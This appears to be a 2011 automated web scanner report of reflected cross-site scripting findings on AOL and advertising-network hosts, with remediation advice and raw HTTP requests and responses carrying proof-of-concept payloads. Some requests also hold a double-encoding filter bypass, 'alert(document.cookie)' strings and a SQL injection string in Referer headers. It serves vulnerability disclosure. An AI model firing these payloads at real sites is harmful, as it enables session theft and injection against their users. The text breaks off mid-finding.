Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3015e"%3bc03e6044435 was submitted in the REST URL parameter 1. This input was echoed as 3015e";c03e6044435 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork3015e"%3bc03e6044435/aol_pp HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240247308.3021032781.3908175104; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:46 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10535 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm02 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm02.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork3015e";c03e6044435"; s_265.prop2="aol_pp"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b307b"%3b18c402aedf2 was submitted in the REST URL parameter 1. This input was echoed as b307b";18c402aedf2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkb307b"%3b18c402aedf2/aolcom_terms HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244834828.3642051917.360777472; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:46 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10547 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm29.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworkb307b";18c402aedf2"; s_265.prop2="aolcom_terms"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d7d"%3b33da55b5274 was submitted in the REST URL parameter 1. This input was echoed as a6d7d";33da55b5274 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworka6d7d"%3b33da55b5274/mem_tos HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.789990733.3773433344; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:46 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10537 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm30 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm30.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworka6d7d";33da55b5274"; s_265.prop2="mem_tos"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba4d3"%3b0da027c5667 was submitted in the REST URL parameter 1. This input was echoed as ba4d3";0da027c5667 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkba4d3"%3b0da027c5667/trademarks HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B; s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE];
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244834828.3642051917.528549632; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:47 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10541 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm29.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworkba4d3";0da027c5667"; s_265.prop2="trademarks"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2cb1"%3b0c58d64b746 was submitted in the REST URL parameter 1. This input was echoed as b2cb1";0c58d64b746 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemapb2cb1"%3b0c58d64b746/ HTTP/1.1 Host: about.aol.com Proxy-Connection: keep-alive Referer: http://latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video?110145548'%20or%201%3d1--%20=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021700063-New%7C1360093700063%3B%20s_nrgvo%3DNew%7C1360093700066%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244834828.3642051917.1132070656; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:12:18 GMT Server: AOLserver/4.0.10 Content-Type: text/html Cteonnt-Length: 10499 Connection: close Content-Length: 10499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm29.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="sitemapb2cb1";0c58d64b746"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c48dd"%3balert(1)//51cb3eab07a was submitted in the clk1 parameter. This input was echoed as c48dd";alert(1)//51cb3eab07a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe!t=639!?che=7735200&clk1=c48dd"%3balert(1)//51cb3eab07a HTTP/1.1 Host: ad.aggregateknowledge.com Proxy-Connection: keep-alive Referer: http://www.aisledash.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=65385214552746607; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDPwEQAAEAhn53%2FItTDiD8ogAAAAAAAAHiAAAAAAAAAz8AAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:24:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb519"><script>alert(1)</script>9f3b6c26b66 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe!t=639!?che=7735200&clk1=cb519"><script>alert(1)</script>9f3b6c26b66 HTTP/1.1 Host: ad.aggregateknowledge.com Proxy-Connection: keep-alive Referer: http://www.aisledash.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=289089061502008663; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDWQEQAAEAhn4H0B%2BXD6%2FnigAAAAAAAAHiAAAAAAAAA1kAAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:24:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe590'%3balert(1)//d0f1bb128f1 was submitted in the kw parameter. This input was echoed as fe590';alert(1)//d0f1bb128f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/article_tools;kw=fe590'%3balert(1)//d0f1bb128f1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 380 Cache-Control: no-cache Pragma: no-cache Date: Sun, 06 Feb 2011 20:59:12 GMT Expires: Sun, 06 Feb 2011 20:59:12 GMT
1.9. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/brokerbutton.smartmoney.com/article_tools
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68712'-alert(1)-'595c492cbdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/brokerbutton.smartmoney.com/article_tools;kw=ETFs;kw=Investing;columns=;contentid=26488;pos=4;ticker=QAI;ticker=MCRO;ticker=MNA;ticker=ALT;ticker=SPY;pagetemplate=1;level2=etfs;level2=etfs;tile=4;sz=120x30;ord=1557503509?&68712'-alert(1)-'595c492cbdb=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 06 Feb 2011 20:59:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 443
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf18'-alert(1)-'10c9706c898 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 20:35:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:53 GMT; path=/ Set-Cookie: i_1=19:1537:705:23:0:38885:1297024553:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:53 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 928
function wsod_image() { document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn ...[SNIP]... eg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.705.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" tit ...[SNIP]...
1.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d164'-alert(1)-'c88d9c62617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 20:35:58 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:58 GMT; path=/ Set-Cookie: i_1=19:1537:706:23:0:38885:1297024558:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:58 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 929
function wsod_image() { document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn ...[SNIP]... g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.706.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" t ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29654%2522%253balert%25281%2529%252f%252fbaf59fc0de was submitted in the REST URL parameter 2. This input was echoed as 29654";alert(1)//baf59fc0de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
